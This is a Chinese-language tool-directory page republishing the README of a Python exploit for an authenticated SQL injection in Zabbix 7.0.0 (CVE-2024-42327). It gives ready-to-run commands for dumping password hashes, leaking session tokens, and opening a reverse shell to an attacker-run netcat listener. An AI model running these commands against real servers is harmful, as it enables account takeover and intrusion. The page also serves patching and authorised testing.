Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-42327_Zabbix_SQLi — 此内容仅用于教育目的。请勿用于未经授权的系统。 | Kitploit
工具/GitHubGitHub/874anthony/cve-2024-42327_zabbix_sqli
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHub874anthony/cve-2024-42327_zabbix_sqli

CVE-2024-42327_Zabbix_SQLi

此内容仅用于教育目的。请勿用于未经授权的系统。

查看仓库

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
11年前尚未审核
分享

🛡️ Zabbix 7.0.0 SQL注入利用脚本

一个Python脚本,用于利用 Zabbix 7.0.0 的已认证SQL注入漏洞,支持多种操作模式,包括用户数据提取、会话令牌泄露、远程命令执行(RCE)以及自定义查询注入。

⚠️ 免责声明:
本脚本仅供 教育 和 授权渗透测试 目的使用。
请 勿 将其用于您不拥有或未经明确许可进行测试的系统。
作者不对任何因使用本工具而导致的误用或损害负责。


✨ 功能特性

  • ✅ 针对 Zabbix 7.0.0 的已认证SQL注入
  • 🧑‍💻 从数据库导出用户哈希
  • 🔐 泄露会话令牌
  • 🐚 通过反向shell实现远程代码执行(需要管理员令牌)
  • 🧠 运行自定义SQL查询

🔧 依赖要求

  • Python 3.6+
  • requests 库

如需安装依赖:

root@kitploit:~
pip install requests

🚀 使用方法

root@kitploit:~
python3 sqliZabbix.py -u <ZABBIX_URL> -U <USERNAME> -p <PASSWORD> --mode <MODE> [可选参数...]

🔘 可用模式

模式

🧪 使用示例

导出用户哈希

root@kitploit:~
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --mode leak-users

泄露会话令牌

root@kitploit:~
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --mode leak-tokens

远程命令执行(反向shell)

root@kitploit:~
# 首先启动监听器:
nc -lvnp 9001

# 然后运行:
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --admin_token <ADMIN_API_TOKEN> --ip <YOUR_IP> --port 9001 --mode rce

自定义SQL注入

root@kitploit:~
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --mode custom --query "SELECT version()"

📁 项目结构

root@kitploit:~
sqliZabbix.py      # 主要的利用脚本
README.md          # 本文档

🧑‍💻 作者

Anthony (@874anthony)

用热爱与好奇精心打造 🐍

🔐 许可协议

本项目采用 MIT 许可证发布。请负责任地使用。

下载工具
描述
是否需要管理员令牌
leak-users导出所有用户ID、用户名、密码哈希及角色❌
leak-tokens从数据库导出所有活跃会话ID❌
rce通过 item.create 漏洞生成反向shell✅
custom通过注入执行任意自定义SQL查询❌